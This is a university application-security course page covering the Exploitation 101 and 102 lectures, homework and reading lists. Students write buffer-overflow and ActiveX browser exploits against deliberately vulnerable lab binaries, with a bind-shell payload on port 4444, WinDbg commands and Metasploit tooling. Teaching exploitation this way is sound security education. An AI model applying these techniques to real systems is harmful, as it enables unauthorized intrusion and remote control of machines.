Application Security and Vulnerability Analysis

Exploitation 101

Lecture

Slides
demo.exe source code, binary (pw: "infected" though it is not a virus), and exploit code

Homework

Exploit the vulnerability in homework-re-fall2011-v2.exe, which is a simple server very similar to the demo.exe from class.

Submit your answers to the following tasks:

1. Write a script to trigger the vulnerability and set EIP to a chosen value. Describe the format of the attack string that you used to trigger the vulnerability. For example, the attack string from the demo could be described as: [ 69 bytes of space ] [ EIP ]

2. Attach WinDbg to homework.exe and trigger the vulnerability. Use the !exploitable extension to analyze the crash. To do this, enter the commands below in the WinDbg command window after WinDbg has reported the exception (crash):

0:001> .load msec
0:001> !exploitable

Document the exception output from WinDbg (where it shows the values of the registers) and the output of the !exploitable command.

3. Write a complete exploit for homework.exe. You will need to find a suitable jump address with WinDbg, Immunity Debugger, or msfpescan. You should use the attached payload (in Ruby). You can write it in any language, but I'd recommend trying to use Ruby because the next homework will include converting your exploit to a Metasploit exploit module.

The homework deliverable is a ruby script, just like demo_exploit.rb, that exploits homework.exe to bind a cmd.exe shell to TCP port 4444 (the payload included in payload.rb does this). Make sure that your return address is one that you chose randomly from the thousands of possible ones that you can find with WinDbg or Immunity Debugger. We don't want to see any duplicates in the submitted homework and definitely none with the return address used in demo_exploit.rb.

Required Reading

The Tao of Windows Buffer Overflows by DilDog (required)
Low-level Software Security: Attacks and Defenses (because you didn't read it the first time)

Discussion | |

Permalink

Exploitation 102

Lecture

Slides

Homework

The homework this week is to write a basic browser exploit. The homework2.zip file contains JavaScript to trigger two vulnerabilities in the Vulnerable.ocx ActiveX control as well as a payload for you to execute. The first vulnerability is a basic stack overflow. The second vulnerability is protected with /GS and requires the abuse of a structured exception handler (SEH) record to exploit. Students are required to write an exploit for only the first flaw, the second is extra credit worth an entire extra homework.

Discussion | |

Permalink

References

Tutorials, Challenges, and Walkthroughs

Shellcode

Exploitation Techniques

Return-Oriented Programming: Exploits Without Code Injection
A gentle introduction to return-oriented programming
Pwn2Own 2010 Windows 7 Internet Explorer 8 Exploit
Exploitation with WriteProcessMemory
ASLR Smack & Laugh Reference
Linux GLibC Stack Canary Values
Exploitation Techniques from IT Sec Catalog
The narly WinDBG extension by d0c s4vage
The viscope WinDBG extension by Jeon Wook Oh

Mitigations

Using Hardening Options - Debian Wiki
Ubuntu Security Features by release
Assessing the Tux Strength: Part 1 - Userspace Memory Protections
Assessing the Tux Strength: Part 2 - Into the Kernel
Windows ISV Software Security Defenses
Chapter 1 of the Mac Hacker's Handbook (see pages 21-29)

Metasploit

Offensive Security's Metasploit Unleashed open course, particularly Porting Exploits (essential)
Metasploit Wiki: Exploit Module Dev (essential)

If you passed this section with ease and understand most of the reading material above, you might want to try taking Immunity's Network Offense Professional certification. Good luck!

Discussion | |

Permalink

Archive

Fall 2010

Exploitation 101 video and slides
Exploitation 102 video and slides

The first homework was to find and exploit the security vulnerability in homework.exe, which is a simple server very similar to the demo.exe (source code) from class.

Please submit your answers to the following tasks:

1. Identify the stack buffer overflow vulnerability in homework.exe using IDA Pro Freeware. Explain the the cause of the vulnerability and how it may be triggered (1-2 paragraphs).

2. Write a script to trigger the vulnerability and set EIP to a chosen value. Describe the format of the attack string that you used to trigger the vulnerability. For example, the attack string from the demo could be described as: [ 69 bytes of space ] [ EIP ]

3. Attach WinDbg to homework.exe and trigger the vulnerability. Use the !exploitable extension to analyze the crash. To do this, enter the commands below in the WinDbg command window after WinDbg has reported the exception (crash):

0:001> .load msec
0:001> !exploitable

Document the exception output from WinDbg (where it shows the values of the registers) and the output of the !exploitable command.

4. Write a complete exploit for homework.exe. You may use the attached payload (in Ruby). You may write it in any language, but I'd recommend trying to use Ruby because the next homework will include converting your exploit to a Metasploit exploit module. Metasploit has been installed into the VM and you can use the command line tools from the included Cygwin Shell:

Start -> All Programs -> Metasploit3 -> Cygwin Shell
$ /msf3/tools/pattern_create.rb 1024

You can also use '/msf3/msfpescan' to find useful jump addresses. You may find that easier than using WinDbg or Immunity Debugger's search commands.

The second homework was to port your exploit for homework.exe to the Metasploit 3 framework. The framework is installed in your VM and you may use it from there or from your VM host. You should convert your exploit into a metasploit exploit module, which will be a single ruby file. Submit this single file as your solution for the homework.

To get you started on Metasploit module development, you should read the following web pages: